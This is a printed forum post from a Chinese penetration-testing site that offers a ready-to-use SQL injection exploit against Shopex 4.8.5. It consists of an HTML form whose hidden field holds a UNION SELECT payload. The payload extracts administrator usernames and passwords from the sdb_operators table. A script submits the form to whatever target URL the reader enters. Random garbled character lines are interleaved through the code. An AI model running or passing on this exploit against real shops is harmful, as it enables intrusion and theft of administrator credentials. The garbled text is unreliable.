中国网络渗透测试联盟
标题:
Shopex 4.8.5 SQL Injection Exp 0day
[打印本页]
作者:
admin
时间:
2013-1-23 09:20
标题:
Shopex 4.8.5 SQL Injection Exp 0day
<center>
3 \8 S. U2 b5 T$ B8 P; ^
<title>中国网络渗透测评联盟-中测联盟|-Shopex 4.8.5 SQL Injection Exp 在线版</title>
_, h$ D3 @3 f
<form action="" method="post" name="submit_url">
" Q' W6 p. x' L) f f9 z
网址:<input type=text name=url value="http://www.political-security.com/" size=62><br><br>
3 n% j1 h1 W- E4 ~
<input type="hidden" name="goods[goods_id]" value="3">
6 l* }1 `- J9 @* k2 o
<input type="hidden" name="goods[product_id]" value="1 and 1=2 union select 1,2,3,4,5,6,7,8,concat(0x245E,username,0x2D3E,userpass,0x5E24),10,11,12,13,14,15,16,17,18,19,20,21,22 from sdb_operators">
9 n# ^# e2 j5 x# B
<input type="submit" value="给我注入" onclick=fsubmit()>
# V8 H8 |& t" C4 |8 s: S% \
</form> <br /><br />填上你要注入的网址(注意要打上http:// 要不跳转不了) 点“给我注入”就要以了。//www.political-security.com
- ^! p, X& F6 |8 W$ t
B9 D$ \) Z4 V" C: U; _2 F$ x% c
<script>
7 V( n$ R- ?1 e2 i6 e
function fsubmit(){
. i- E$ v7 |' |! r; S. v3 B! p
form = document.forms[0];
. I* \9 b* ~; I6 C; M! Q! O
form.action = form.url.value+'/?product-gnotify';
C9 x: R5 L, c1 U" k- q
form.submit();
5 F. g7 \- a7 `! K+ U
}
) C! ~8 R2 R$ C* b0 y
</script>
) s" S( z& ?7 G9 I
欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/)
Powered by Discuz! X3.2